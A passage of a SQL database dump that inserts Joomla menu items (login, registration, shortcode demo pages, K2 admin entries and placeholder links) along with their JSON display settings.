text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',200,201,0,'*',0),(140,'mainmenu','Login','login','','features/2013-01-31-07-00-49/joomla/login','index.php?option=com_users&view=login','component',-2,123,4,25,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"login_redirect_url\":\"\",\"logindescription_show\":\"1\",\"login_description\":\"\",\"login_image\":\"\",\"logout_redirect_url\":\"\",\"logoutdescription_show\":\"1\",\"logout_description\":\"\",\"logout_image\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',202,203,0,'*',0),(141,'mainmenu','Registration','registration','','features/2013-01-31-07-00-49/joomla/registration','index.php?option=com_users&view=registration','component',-2,123,4,25,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',204,205,0,'*',0),(142,'mainmenu','Accordion','accordion','','shortcode/accordion','index.php?option=com_content&view=article&id=3','component',-2,107,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',148,149,0,'*',0),(143,'mainmenu','Carousel','carousel','','shortcode/carousel','index.php?option=com_content&view=article&id=4','component',-2,107,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',150,151,0,'*',0),(144,'mainmenu','Tab','tab','','shortcode/tab','index.php?option=com_content&view=article&id=5','component',-2,107,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',152,153,0,'*',0),(145,'mainmenu','Map','map','','shortcode/map','index.php?option=com_content&view=article&id=6','component',-2,107,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',168,169,0,'*',0),(146,'mainmenu','Testimonial ','testimonial','','shortcode/testimonial','index.php?option=com_content&view=article&id=7','component',-2,107,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',166,167,0,'*',0),(147,'mainmenu','Alert','alert','','shortcode/alert','index.php?option=com_content&view=article&id=8','component',-2,107,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',164,165,0,'*',0),(148,'mainmenu','Button','button','','shortcode/button','index.php?option=com_content&view=article&id=9','component',-2,107,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',162,163,0,'*',0),(149,'mainmenu','Icon','icon','','shortcode/icon','index.php?option=com_content&view=article&id=10','component',-2,107,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',154,155,0,'*',0),(150,'mainmenu','Column','column','','shortcode/column','index.php?option=com_content&view=article&id=11','component',-2,107,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',156,157,0,'*',0),(223,'mainmenu','constetu adipi','2013-10-02-07-10-01','','home/2013-09-24-08-36-52/2013-10-02-07-10-01','#','url',-2,208,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',17,18,0,'*',0),(222,'mainmenu','Blog','blog','','blog','index.php?option=com_k2&view=itemlist&layout=category&task=category&id=5','component',-2,1,1,10048,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"categories\":[\"5\"],\"singleCatOrdering\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',241,242,0,'*',0),(322,'mainmenu','Maitinimo meniu','maitinimo-meniu','','maitinimas/maitinimo-meniu','index.php?option=com_content&view=article&id=322','component',1,288,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',114,115,0,'*',0),(154,'mainmenu','Gallery','gallery','','shortcode/gallery','index.php?option=com_content&view=article&id=16','component',-2,107,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',158,159,0,'*',0),(155,'mainmenu','Video','video','','shortcode/video','index.php?option=com_content&view=article&id=17','component',-2,107,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',160,161,0,'*',0),(156,'mainmenu','404','2013-02-06-08-37-59','','features/2013-01-31-07-00-49/joomla/2013-02-06-08-37-59','index.php?option=404','url',-2,123,4,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',206,207,0,'*',0),(197,'main','COM_K2','com-k2','','com-k2','index.php?option=com_k2','component',0,1,1,10048,0,0,'0000-00-00 00:00:00',0,1,'../media/k2/assets/images/system/k2_16x16.png',0,'',305,326,0,'',1),(198,'main','K2_ITEMS','k2-items','','com-k2/k2-items','index.php?option=com_k2&view=items','component',0,197,2,10048,0,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',306,307,0,'',1),(199,'main','K2_CATEGORIES','k2-categories','','com-k2/k2-categories','index.php?option=com_k2&view=categories','component',0,197,2,10048,0,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',308,309,0,'',1),(200,'main','K2_TAGS','k2-tags','','com-k2/k2-tags','index.php?option=com_k2&view=tags','component',0,197,2,10048,0,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',310,311,0,'',1),(201,'main','K2_COMMENTS','k2-comments','','com-k2/k2-comments','index.php?option=com_k2&view=comments','component',0,197,2,10048,0,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',312,313,0,'',1),(202,'main','K2_USERS','k2-users','','com-k2/k2-users','index.php?option=com_k2&view=users','component',0,197,2,10048,0,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',314,315,0,'',1),(203,'main','K2_USER_GROUPS','k2-user-groups','','com-k2/k2-user-groups','index.php?option=com_k2&view=usergroups','component',0,197,2,10048,0,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',316,317,0,'',1),(204,'main','K2_EXTRA_FIELDS','k2-extra-fields','','com-k2/k2-extra-fields','index.php?option=com_k2&view=extrafields','component',0,197,2,10048,0,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',318,319,0,'',1),(205,'main','K2_EXTRA_FIELD_GROUPS','k2-extra-field-groups','','com-k2/k2-extra-field-groups','index.php?option=com_k2&view=extrafieldsgroups','component',0,197,2,10048,0,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',320,321,0,'',1),(206,'main','K2_MEDIA_MANAGER','k2-media-manager','','com-k2/k2-media-manager','index.php?option=com_k2&view=media','component',0,197,2,10048,0,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',322,323,0,'',1),(207,'main','K2_INFORMATION','k2-information','','com-k2/k2-information','index.php?option=com_k2&view=info','component',0,197,2,10048,0,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',324,325,0,'',1),(208,'mainmenu','Admission Process','2013-09-24-08-36-52','','home/2013-09-24-08-36-52','#','url',-2,101,2,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"1\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',12,29,0,'*',0),(209,'mainmenu','Lorem Ipsum','2013-09-24-08-38-45','','home/2013-09-24-08-36-52/2013-09-24-08-38-45','#','url',-2,208,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',13,14,0,'*',0),(210,'mainmenu','Dolar Sit Amet','2013-09-24-08-39-46','','home/2013-09-24-08-36-52/2013-09-24-08-39-46','#','url',-2,208,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',15,16,0,'*',0),(211,'mainmenu','Tuition & Fees','2013-09-24-08-40-33','','home/2013-09-24-08-40-33','#','url',-2,101,2,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"1\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',30,47,0,'*',0),(212,'mainmenu','Lorem Ipsum','2013-09-24-08-41-11','','home/2013-09-24-08-40-33/2013-09-24-08-41-11','#','url',-2,211,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',31,32,0,'*',0),(213,'mainmenu','Dolar Sit Amet','2013-09-24-08-41-45','','home/2013-09-24-08-40-33/2013-09-24-08-41-45','#','url',-2,211,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',33,34,0,'*',0),(214,'mainmenu','Downloads','2013-09-24-09-00-50','','home/2013-09-24-09-00-50','#','url',-2,101,2,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"1\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"modules\",\"mods\":[\"151\"]}',48,49,0,'*',0),(215,'mainmenu','Pages','pages','','pages','#','url',-2,1,1,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',227,236,0,'*',0),(238,'mainmenu','Preset5','2013-10-07-12-22-04','','2013-01-31-07-20-51/2013-10-07-12-22-04','?preset=preset5','url',-2,117,2,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',222,223,0,'*',0),(239,'mainmenu','Preset6','2013-10-07-12-22-28','','2013-01-31-07-20-51/2013-10-07-12-22-28','?preset=preset6','url',-2,117,2,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',224,225,0,'*',0),(216,'mainmenu','About Us','about-us','','pages/about-us','index.php?option=com_content&view=article&id=29','component',-2,215,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',228,229,0,'*',0),(217,'mainmenu','Contact Us','contact-us','','pages/contact-us','index.php?option=com_content&view=article&id=30','component',-2,215,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',230,231,0,'*',0),(218,'mainmenu','Gallery','gallery','','pages/gallery','index.php?option=com_content&view=article&id=66','component',-2,215,2,22,0,0,'0000-00-00 